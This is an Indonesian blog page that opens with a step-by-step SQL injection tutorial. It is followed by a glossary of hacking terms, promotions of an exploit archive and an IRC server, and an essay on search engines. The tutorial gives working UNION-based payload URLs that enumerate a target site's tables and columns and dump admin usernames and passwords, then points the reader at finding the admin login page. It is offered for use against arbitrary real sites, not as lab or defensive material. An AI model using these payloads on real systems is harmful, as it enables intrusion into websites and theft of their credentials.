Minggu, 12 Juni 2011

SQL Injection Manual

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
step Satu
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
step Dua
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
step Tiga
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
step Empat
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
Step Lima
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
Step Enam
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
Step Tujuh
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
Step Delapan
==============

tahap terakhir mencari halam admin atau login . biasanya saya disni memkai adminfinder

Sumber : http://www.hn-team.co.cc/2009/10/my-sql.html
Thank to Up aka Deden Ramadhan GobeL

Beberpa istilah di dalam Hacking

SQL Injection

  • injeksi kode teknik yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL
DDOS [ Distributed Denial of Service ]

  • serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim, spt bandwith, memory, dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar, biasanya menggunakan bot pd irc atau pakai sesuatu tool.
Bug


Patch
  • adalah tambalan dalam bentuk source code, jadi yang ditambal itu bukan binarynya tapi source codenya. Ini berbeda dengan istilah Service Pack di sistem operasi lain yang bukan merupakan sebuah patch atau tambalan, karena Service Pack itu mengganti binary dengan binary yang baru yang mempunyai feature baru dan atau menutupi bug di binary yang lama.

Vurnerable
  • sebuah system yg mempunyai suatu kelemahan yg mudah untuk di serang
Shell

  • adalah program (penterjemah perintah) yang menjembatani user dengan sistem operasi dalam hal ini kernel (inti sistem operasi), umumnya shell menyediakan prompt sebagai user interface, tempat dimana user mengetikkan perintah-perintah yang diinginkan baik berupa perintah internal shell (internal command), ataupun perintah eksekusi suatu file progam (eksternal command), selain itu shell memungkinkan user menyusun sekumpulan perintah pada sebuah atau beberapa file untuk dieksekusi sebagai program.

Deface
  • adalah merubah tampilan web orang dg paksa dengan mengganti index halaman pada suatu website.

Debug
  • sebuah metode yang dilakukan oleh para pemrogram dan pengembang perangkat lunak untuk meng-analisa alur kerja program, mencari dan mengurangi bug, atau kerusakan di dalam sebuah program komputer atau perangkat keras sehingga perangkat tersebut bekerja sesuai dengan harapan. Debugging cenderung lebih rumit ketika beberapa subsistem lainnya terikat dengan ketat dengannya, mengingat sebuah perubahan di satu sisi, mungkin dapat menyebabkan munculnya bug lain di dalam subsistem lainnya.
XSS
  • adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising

  • adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal dalam bentuk sebuah web alias pemalsuan.

Keylogger

  • adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata dalam artian katak spy )

Exploit-ID Indonesian Exploit Archive

Assalamualaikum warahmatullahi wabarokatuh
kmaren sya coba2 login lagi ke situs feelcomz eh g tau na ada info baru nih

maaf sebelom na nih mas jos_ali_joe aq copas dari feelcomz ea :D

Exploit ID adalah sebuah situs yg mempunyai beberapa kumpulan artikel2 , news tentang it , dan didalamnya memang lebih mengacu ke sebuah web yang menyimpan arsip2 dari eksploit2 yang ada , kita tahu sendiri bahwa banyak sekali orang2 indonesia yang telah mampu/bisa membuat eksploit2 sendiri , dan hanya ditampung oleh2 situs2 luar , misal : exploit-db , packetstromsecurity , inj3ct0r, security reason , exploit-db , dan lain2 , sangat disayangkan sekali karena belum ada arsip exploit buatan anak bangsa , maka Exploit ID membuat sebuah situs seperti tadi. yang bernama exploit-id ,

singkat sejarah terbentuknya Exploit-ID Indone*sian Exploit Archive yang mem*pun*yai tujuan untuk berbagi ten*tang hal kea*manan di bidang jaringan dan kom*puter. Awal berdiri Exploit-ID meru*pakan keti*dak*sen*ga*jaan founder per*tama yang mem*pun*yai cita-cita untuk mem*buat sebuah archive exploit. Dari ide terse*but terny*ata men*da*pat respon posi*tif dari beber*apa senior hacker di Indone*sia, sehingga dapat ter*ben*tuk*lah team untuk meng*garap Exploit-ID. Semoga Exploit-ID dapat men*jadi solusi arsip exploit yang berguna

oleh karena itu Exploit ID sangat mengharapkan bantuan dari kita2 , kawan2 semua di berbagai forum yang kita cintai ini , demi kemajuan IT indonesia menuju ke sebuah hal yang positif , untuk ikut berkontribusi mengirimkan exploit2 yang di punyainya atau hasil riset nya di web milik kita semua , tidak hanya itu Exploit ID juga menerima submit2 artikel2 lainnya yang berhubungan dengan dunia security IT , untuk rule dan proses submit artikel nya telah tercantum di website.

ini adalah situs/website kita semua , milik anak bangsa, mereka mempersembahkan untuk kemajuan IT indonesia ,karena website itu masih sangat2 jauh dari kata sempurna oleh karena itu doa dan dukungan terlebih moril dan support dari kita2 semua sangat mereka harapkan.

http://www.exploit-id.com

AnasKi CreW IRC Network Server

hello Viva AnasKi krn udh lama g update post akhirnya saya update lagi nih kli ni sya kan buat tutorial yg lebih mantap....

kali ini cukup dg server baru kami :D

irc.pasbar.com

untuk inginkan sebuah vhost bisa lansung menuju channel : #vhost
untuk bertanya silahkan masuk saja ke channel : #help dan tunggu respone dari kami

jika ada pertanyaan yg lain silahkan masuk ke channel anaski di irc.pasbar.com dan pv JFry_ jka ada waktu luang sya akan menjawab pertanyaan nya

jng lupa Free PsyBnc tapi hnya buat server anaski saja ya :D

Sabtu, 19 Maret 2011

Jenis-jenis Search Engine

Mesin pencari (search engine) adalah salah satu program komputer yang di rancang
khusus untuk membantu seseorang menemukan file-file yang disimpan dalam computer,
misalnya dalam sebuah web server umum di web (www) atau komputer sendiri. Mesin pencari
memungkinkan kita untuk meminta content media dengan criteria yang spesipik ( biasanya
berisikan prase atau kata yang kita inginkan) dan memperoleh daftar file yang memenuhi criteria
tersebut. Mesin pencari biasanya menggunakan indeks ( yang sudah di buat sebelumnya dan di
mutakhirkan secara teratur ) untuk mencari file setelah pengguna memasukan kriteria pencarian.
Mesin pencari yang akan saya bahas adalah mesin pencari khusus yang di gunakan untuk
mencari informasi dan berbagai file di Internet, sehingga mesin pencari sangat berguna bagi para
penggunanya untuk mencari berbagai bahan referensi atau lainnya.
Untuk memudahkan pencarian di database yang begitu besar, mesin pencari
menggunakan indeks untuk memilah-milah informasi yang ada di database. Sedangkan untuk
memudahkan dan mempercepat pencarian, mesin pencari mempunyai metode pencarian tertentu
yang sering di sebut algoritma pencarian, kecepatan dan ketepatan pencarian sebuah mesin
pencarian tergantung kepada cara pengindeksan dan algoritma pencarian ayng digunakan.

Struktur umum sebuah mesin pencari adalah sebagai berikut :

a. Kotak teks pencari
Kotak ini digunakan sebagai tempat memasukan kata kunci yang akan dijadikan
acuan dilakukan pencarian.

b. Tombol pencari
Tobol ini yang akan menjalankan perintah pencarian.

JENIS-JENIS MESIN PENCARI

Berdasarkan cara mengumpulkan data halaman-halaman web, mesin pencari dapat di
kelompokkan menjadi 4 kategori

- Human Organized Search Engine

Mesin pencari yang di kelola sepenuhnya oleh tangan manusia. Mesin pencari ini
menggunakan metode dengan memilah-milih informasi yang relevan dan dikelompokan
sedemikian rupa sehingga lebih bermakna dan bermanfaaat bagi penggunannya. Situs ini dalam
prakteknya memperkerjakan para pakar dalam bidang-bidang tertentu, kemudian para pakar
tersebut dapat mengkelompokan situs-situs tertentu sesuai dengan bidangnnya atau kategori situs
itu sendiri.

www.yahoo.com
www.looksmart.com
www.about.com
Dmoz.org

- Computer Created Search Engine

Search engine kategori ini banyak memiliki kelebihan karena banyak menyajikan
inforrmasi walaupun kadang-kadang ada beberapa informasi yang tida relevan tidak seperti yag
kita ingin kan. Search engine ini telah menggunakan software laba-laba atau spider software
yang berfungsi menyusup pada situs-situs tertentu, kemudian mengunpulkan data serta
mengelompokan dengan sedikit bantuan tangan manusia.

www.webcrawler.com
www.excite.com
www.inktomi.com
www.nothernlight.com
www.altheweb.com

- Hybrid Seacrh Engine

Merupakan gabungan antara tangan manusia dengan computer, sehingga menghasilkan
hasil pencarian yang relative akurat. Peran manusia dalam hal ini adalah sebagai penelaah dalam
proses pengkoleksian database halaman web. Sebenarnya tipe ini lah yanag paling mudah
pembuatannya menurut saya karena dapat di desaingsesuai dengan keinginan kita.

www.lycos.com
www.altavista.com
www.hotbot.com
www.goto.com
www.snap.com
www.directthit.com
www.google.com
go.com

- MetaCrawler/Metasearch
Merupakan perantara dari mesin pencari yang sebenarnya. Mesin ini hanya akan
mengirimkan permintaan pencarian ke berbagai mesin pencari serta menampilkan hasilnya satu
di layer browser sehingga akan menampilkan banyak sekali hasil dari ber bagai mesin pencari
yang ada.

savvysearch.com
www.dogpile.com
www.infind.com
www.snap.com

Cara kerja mesin pencari

Mesin pencari web bekerja dengan cara menyimpan informasi tertang banyak halaman
web, yang diambil secara langsung dari www. Halaman ini di ambil dengan web
crawler-browsewr web yang otomatis mengikuti setiap pranala yang di lihatnya. Isi setiap
halaman lalu dianalisis untuk menentukan cara mengindeksnya (misalnya kata-kata di ambil dari
judul, subjudul, atau field khusus yang di sebut meta tag ). Data tentang halaman web disimpan
dalam sebuah database indeks untuk di gunakan dalam pencarian selanjutnya. Sebagian mesin
pencari seperti Google, menyimpan seluruh atau sebagian halaman sumber ( yang di sebut cache)
maupun informasi tentang halaman web itu sendiri.
Ketika seorang pengguna menggunakan mesin pencari dan memasukin query, biasanya
dengan memasukan kata kunci, mesin mencari akan meng-
indesk dan memberikan daftar halaman web yang paling sesuai dengan kriterianya.
Daftar ini biasanya di sertai ringkasan singkat menggenai judul dokumen dan terkadang sebagian
teks dari hasil pencarian yang kita cari.

Sebenarnya Banyak sekali penjelasan-penjelasan yang lebih luas dan detail tentang Mesin
Pencari (search engine) yang bias anda dapatkan dari Internet atau media lainnya, saya
hanya berusaha memberikan sedikit ilmu yang sedikit saya tahu tentang mesin pencari.

REFERENSI

Eko Supriyadi, M.Pd. Teknologi Informasi dan Komunikasi Kelas XI. Sinar Mandiri: Klaten

http://id.wikipedia.com